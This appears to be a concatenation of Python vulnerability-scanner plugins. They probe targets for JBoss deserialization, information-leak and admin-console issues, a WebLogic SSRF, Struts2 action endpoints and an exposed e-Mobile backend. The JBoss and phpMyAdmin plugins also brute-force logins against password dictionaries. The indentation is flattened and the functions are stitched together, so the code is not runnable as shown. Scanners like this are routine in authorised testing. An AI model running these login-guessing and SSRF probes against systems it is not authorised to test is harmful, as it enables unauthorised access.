http = httpparse()
print('testing if e-Mobile backstage')
try:
#header = {"User-Agent":"Mozilla/5.0 (Windows NT 6.1; WOW64; rv:43.0) Gecko/20100101 Firefox/43.0"}
tm = http.httpreq('GET', protocol, ip, port, '/login.do')
if tm[0] == 200 and re.search(b'e-Mobile', tm[2], re.I):
msg = 'e-Mobile backstage is:' + url + '/login.do'
number = 'v21'
print(msg)
return True, url, number, msg
else:
msg = 'Ther is no e-Mobile backstage'
number = 'v0'
return False, url, number, msg
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
def verify(protocol,ip,port):
url = protocol+'://'+ip+':'+str(port)
print('testing if CVE-2017-7504 JBOSSMQ JMS colony unserialized vul')
http = httpparse()
tag = 'This is the JBossMQ HTTP-IL'
try:
tm = http.httpreq('GET', protocol, ip, port, '/jbossmq-httpil/HTTPServerILServlet')
if (re.search(tag,str(tm[2]),re.I)) and tm[0] == 200 and (re.search('JBoss',str(tm[1]),re.I)):
msg = 'There is CVE-2017-7504 JBOSSMQ JMS colony unserialized vul on url: ' +url+ ' .'
number = 'v61'
return True,url,number,msg
else:
pass
except Exception as e:
msg = str(e)
number = 'v0'
return False,url,number,msg
msg = 'There is no CVE-2017-7504 JBOSSMQ JMS colony unserialized vul'
number = 'v0'
return False,url,number,msg
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
print('testing if jboss information disclose vul')
http = httpparse()
tag = 'Max processing time'
try:
tm = http.httpreq('GET', protocol, ip, port, '/status?full=true')
if (re.search(tag, str(tm[2]), re.I)) and tm[0] == 200 and (re.search(
'JBoss', str(tm[1]), re.I)):
msg = 'There is jboss information disclose vul on url: ' + url + '/status?full=true.'
number = 'v91'
return True, url, number, msg
else:
pass
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
msg = 'There is no jboss information disclose vul'
number = 'v0'
return False, url, number, msg
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
print('testing if JBOSS-adminConsole')
http = httpparse()
try:
tm = http.httpreq('GET', protocol, ip, port,
'/admin-console/index.seam')
if re.search('jboss', str(tm[1]), re.I) and tm[0] == 200:
#header = {"Cookie":"JSESSIONID=A04D33474CB89BA12F4DECA06F2B1003"}
for password in psw:
data = 'login_form=login_form&login_form%3Aname=admin&login_form%3Apassword='******'&login_form%3Asubmit=Login&javax.faces.ViewState=j_id4'
data = data.encode(encoding='utf-8')
tm = http.httpreq('POST',
protocol,
ip,
port,
'/admin-console/login.seam',
data=data)
if not re.search(b'attempt failed', tm[2], re.I):
msg = 'Found JBOSS-adminConsole! in url:' + url + '/admin-console/index.seam with password: '******'.'
print(msg)
number = 'v5'
return True, url, number, msg
else:
msg = 'Cannot found JBOSS-adminConsole! in url:' + url + '/admin-console/index.seam'
number = 'v0'
return False, url, number, msg
else:
msg = 'The url:' + url + 'is not jboss'
number = 'v0'
return False, url, number, msg
except Exception as e:
print(e)
msg = 'error'
number = 'v0'
return False, url, number, msg
msg = 'There is no JBOSS-adminConsole weakpass vul on url'
number = 'v0'
return False, url, number, msg
def verify(protocol, ip, port):
url = protocol + '://' + ip + ':' + str(port)
print('testing if weblogic ssrf vul')
http = httpparse()
tag = 'Received a response from url: http://10.30.1.61 which did not have a valid SOAP'
try:
tm = http.httpreq(
'GET', protocol, ip, port,
'/uddiexplorer/SearchPublicRegistries.jsp?operator=http://10.30.1.61&rdoSearch=name&txtSearchname=sdf&txtSearchkey=&txtSearchfor=&selfor=Business+location&btnSubmit=Search'
)
if (re.search(tag, str(tm[2]), re.I)) and tm[0] == 200:
msg = 'There is weblogic ssrf vul on url: ' + url + ' .'
number = 'v60'
return True, url, number, msg
else:
pass
except Exception as e:
msg = str(e)
number = 'v0'
return False, url, number, msg
msg = 'There is no weblogic ssrf vul'
number = 'v0'
return False, url, number, msg
def http_url(self, method, url, postdata='', header={}):
http = httpparse()
if re.search('^http', url, re.I):
url_all = url
url_ele = url.split('/')
if len(url_ele) > 3 and url_ele[-1] != '':
url_tail = re.search(
'/' + url_ele[3] + '$|/' + url_ele[3] + '/.*', url,
re.I).group()
#print url_tail
else:
url_tail = '/'
if re.search(':', url_ele[2]):
if method == 'GET':
tm = http.httpreq('GET',
url_ele[0].replace(':', ''),
url_ele[2].split(':')[0],
int(url_ele[2].split(':')[1]),
url_tail,
header=header)
else:
tm = http.httpreq('POST',
url_ele[0].replace(':', ''),
url_ele[2].split(':')[0],
int(url_ele[2].split(':')[1]),
url_tail,
data=postdata)
else:
if re.search('^https', url, re.I):
port = 443
else:
port = 80
if method == 'GET':
tm = http.httpreq('GET',
url_ele[0].replace(':', ''),
url_ele[2],
port,
url_tail,
header=header)
else:
tm = http.httpreq('POST',
url_ele[0].replace(':', ''),
url_ele[2],
port,
url_tail,
data=postdata)
else:
url_all = self.protocol + '://' + self.ip + ':' + str(
self.port) + '/' + url
#url_all = self.protocol + '://' + self.ip + ':' + str(self.port) + url
if method == 'GET':
tm = http.httpreq('GET',
self.protocol,
self.ip,
self.port,
'/' + url,
header=header)
else:
tm = http.httpreq('POST',
self.protocol,
self.ip,
self.port,
'/' + url,
data=postdata)
return (url_all, tm)
def run(self):
action_url = []
result = {}
http2 = httpparse()
#===Confirm root(location = ''/location = "")
try:
tm = http2.httpreq('GET', self.protocol, self.ip, self.port, '/')
if tm[0] == 301 or tm[0] == 302:
tm = http2.httpreq('GET',
self.protocol,
self.ip,
self.port,
'/',
header='location')[1]
self.newself(tm)
else:
new_tm = re.sub(b'//.*location', b'//aa', tm[2])
if re.search('location.*=\s*\'.*\'|location.*=\s*\".*\"',
str(new_tm), re.I):
locat_url_g = re.search(
'location.*=\s*\'(.*)\'|location.*=\s*\"(.*)\"',
str(new_tm), re.I)
if locat_url_g.group(1) is None:
locat_url = locat_url_g.group(2)
else:
locat_url = locat_url_g.group(1)
if re.search('http', locat_url, re.I):
self.newself(locat_url)
else:
self.root_urls.append(locat_url)
#print self.protocol, self.ip, self.port, self.root_urls
#===fetch self.root_urls for js and action/do
for root_url in self.root_urls:
if re.search('\.action|\.do', root_url, re.I):
action_url.append(
re.search('.*\.action|.*\.do', root_url, re.I).group())
tm = self.http_url('GET', root_url)[1]
action_url = action_url + self.findaction(str(
tm[2])) + self.actioninjs(str(tm[2]))
print(self.ip, self.port, self.protocol, self.root_urls)
#===guess index.action/login.action
if len(self.root_urls) == 1:
for m in [
'index.action', 'index.do', 'login.action', 'login.do',
'test.action', 'test.do', 'default.action',
'default.do'
]:
if not re.search(m, str(action_url), re.I):
rp_code = http2.httpreq('GET', self.protocol, self.ip,
self.port, '/' + m)[0]
if rp_code not in [401, 403, 404, 501, 502, 503, 504
] and rp_code > 1:
action_url.append(m)
else:
root_urls_ele = self.root_urls[1].split('/')
if re.search('\.', root_urls_ele[-1]):
root_path = self.root_urls[1].rstrip(root_urls_ele[-1])
else:
root_path = self.root_urls[1]
if not re.search('/$', root_path):
root_path = root_path + '/'
for m in [
'index.action', 'index.do', 'login.action', 'login.do',
'test.action', 'test.do', 'default.action',
'default.do'
]:
if not re.search(m, str(action_url), re.I):
rp_code = http2.httpreq('GET', self.protocol, self.ip,
self.port, '/' + m)[0]
if rp_code not in [401, 403, 404, 501, 502, 503, 504
] and rp_code > 1:
action_url.append(m)
rp_code = self.http_url('GET', root_path + m)[1][0]
if rp_code not in [401, 403, 404, 501, 502, 503, 504
] and rp_code > 1:
action_url.append(root_path + m)
print('>>>>>>>>>>>action_url:', action_url)
#===Check St2
for url in action_url:
if not re.search('=', url):
rp_code = self.http_url('GET', url)[1][0]
if rp_code not in [401, 403, 404, 501, 502, 503, 504
] and rp_code > 1:
result = self.struts2(url)
if len(result) > 0:
break
except Exception as e:
print(str(e))
return result
def verify(protocol,ip,port):
url = protocol+'://'+ip+':'+str(port)
flag_list = [b'src="navigation.php', b'frameborder="0" id="frame_content"', b'id="li_server_type">',
b'class="disableAjax" title=']
user_list = ['root', 'mysql', 'wwwroot', 'admin', 'zte']
error_i = 0
print('testing if phpmyadmin weak pass vul')
http = httpparse()
try:
path = '/'
tm = http.httpreq('GET', protocol, ip, port,path)
if b'input_password' in tm[2] and b'name="token"' in tm[2]:
url = 'http://' + ip + ":" + str(port) + "/index.php"
else:
path = path+"phpmyadmin/"
newtm = http.httpreq('GET', protocol, ip, port,path)
if b'input_password' in newtm[2] and b'name="token"' in newtm[2]:
url = 'http://' + ip + ":" + str(port) + "/phpmyadmin/index.php"
else:
msg = 'It is not phpmyadmin server on url:' +url+'.'
number = 'v0'
return False,url,number,msg
except Exception as e:
pass
passdictarr = getpassdict()
psw = passdictarr.get_pass_dict()
#psw = random.sample(psw, 4)
for user in user_list:
for pass_ in psw:
try:
opener = urllib.request.build_opener(urllib.request.HTTPCookieProcessor())
res_html = opener.open(url, timeout=10).read()
res_html = res_html.decode()
token = re.search('name="token" value="(.*?)" />', res_html)
token_hash = urllib.parse.quote(token.group(1))
postdata = "pma_username=%s&pma_password=%s&server=1&target=index.php&lang=zh_CN&collation_connection=utf8_general_ci&token=%s" % (
user, pass_, token_hash)
postdata = postdata.encode(encoding="utf-8")
res = opener.open(url,postdata, timeout=5)
res_html = res.read()
for flag in flag_list:
if flag in res_html:
msg = 'There is phpmyadmin weak pass vul on: %s , with username: %s and password: %s.' %(url,user,pass_)
print(msg)
number = 'v74'
return True,url,number,msg
else:
pass
except urllib.error.URLError as e:
msg = str(e)
error_i += 1
if error_i >= 3:
msg = 'There is no phpmyadmin server on url:' +url+'.'
number = 'v0'
return False,url,number,msg
except Exception as e:
msg = str(e)
msg = 'Therer is no phpmyadmin weakpass vul in url:' +url+'.'
number = 'v0'
return False,url,number,msg
